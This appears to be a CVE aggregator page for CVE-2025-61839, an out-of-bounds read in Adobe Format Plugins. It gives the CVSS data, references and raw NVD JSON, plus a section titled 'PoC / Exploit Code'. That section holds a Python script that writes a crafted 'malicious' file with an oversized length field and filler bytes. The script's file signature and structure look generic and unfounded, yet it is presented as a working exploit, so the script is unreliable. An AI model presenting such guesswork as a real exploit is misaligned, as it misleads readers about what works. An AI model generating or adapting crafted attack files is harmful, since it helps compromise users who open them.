CVE-2025-61839

Description

Format Plugins versions 1.1.1 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:* - VULNERABLE

Adobe Format Plugins <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct
import os

def create_malicious_file(filename):
    """
    PoC for CVE-2025-61839 - Adobe Format Plugins Out-of-Bounds Read
    This creates a crafted file that triggers an out-of-bounds read vulnerability
    when parsed by Format Plugins versions <= 1.1.1
    """
    # Craft a malicious file header with oversized data length field
    header = b'FMTP'  # Format Plugin signature
    header += struct.pack('<I', 0xFFFFFFFF)  # Malicious oversized length field
    header += b'\x00' * 100  # Padding to trigger OOB read
    
    # Add malicious data that extends beyond buffer boundaries
    malicious_data = b'A' * 1000  # Data that will be read out of bounds
    
    with open(filename, 'wb') as f:
        f.write(header + malicious_data)
    
    print(f"[+] Created malicious file: {filename}")
    print(f"[+] File size: {os.path.getsize(filename)} bytes")

if __name__ == '__main__':
    create_malicious_file('CVE-2025-61839.malicious')
    print("[+] PoC file created. Users must open this file with Adobe Format Plugins to trigger the vulnerability.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61839
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61839
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61839/
[4] VulDB https://vuldb.com/cve/CVE-2025-61839
[5] https://helpx.adobe.com/security/products/formatplugins/apsb25-114.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61839", "sourceIdentifier": "[email protected]", "published": "2025-11-11T19:15:35.607", "lastModified": "2025-11-13T15:19:50.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Format Plugins versions 1.1.1 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:*", "matchCriteriaId": "9FE89744-A347-4449-8733-D54CA0E25723"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/formatplugins/apsb25-114.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}